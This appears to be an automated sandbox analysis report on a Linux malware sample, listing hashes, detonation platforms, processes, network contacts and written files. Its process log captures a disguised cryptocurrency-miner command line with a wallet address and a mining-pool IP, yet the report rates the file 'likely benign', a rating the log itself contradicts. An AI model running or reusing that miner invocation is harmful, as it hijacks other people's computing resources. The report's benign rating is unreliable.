Analysis Overview
SHA256
77d533c4a4865fc909174204dd0a957fa1b79b74ad02b0a72ec313db80261087
Threat Level: Likely benign
The file 61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118 was found to be: Likely benign.
Malicious Activity Summary
Checks CPU configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-21 03:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-21 03:40
Reported
2024-05-21 03:43
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/grep | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/bash.pid | /tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118 | N/A |
Processes
/tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118
[/tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118]
/usr/bin/wc
[wc -l]
/usr/bin/sort
[sort -u]
/bin/grep
[grep ^core id /proc/cpuinfo]
/bin/uname
[uname -m]
/usr/bin/perl
[perl b.pl]
/tmp/h64
[./h64 -s sd-pam ./Word -a cryptonight -u 1QEVkXuQe8yN6PRHCQpxCfGQAFwTXBXxJj -o stratum+tcp://163.172.18.134:8080 -p x:[email protected] -k -B -l Word.txt --donate-level=1]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.15:443 | tcp |
Files
/tmp/bash.pid
| MD5 | 94f95cdbde2a1f83e642c708096500d0 |
| SHA1 | a59ac422b60f8a6841bd649fe1f8fd5588dc6a9b |
| SHA256 | aef8505db2d1dea920d252288be2138f3cbbd4a72e1e29b08b875a7708288107 |
| SHA512 | e17531c92c55c2ef939a8ed8e3a573f50583326ba86bd4b3c65150b4ecfb66b3ed2ba489e60f7bbe4af0d3a057075ad1952acdb93482975167a6682096a4b699 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-21 03:40
Reported
2024-05-21 03:43
Platform
debian9-armhf-20240226-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-21 03:40
Reported
2024-05-21 03:40
Platform
debian9-mipsbe-20240226-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-21 03:40
Reported
2024-05-21 03:41
Platform
debian9-mipsel-20240226-en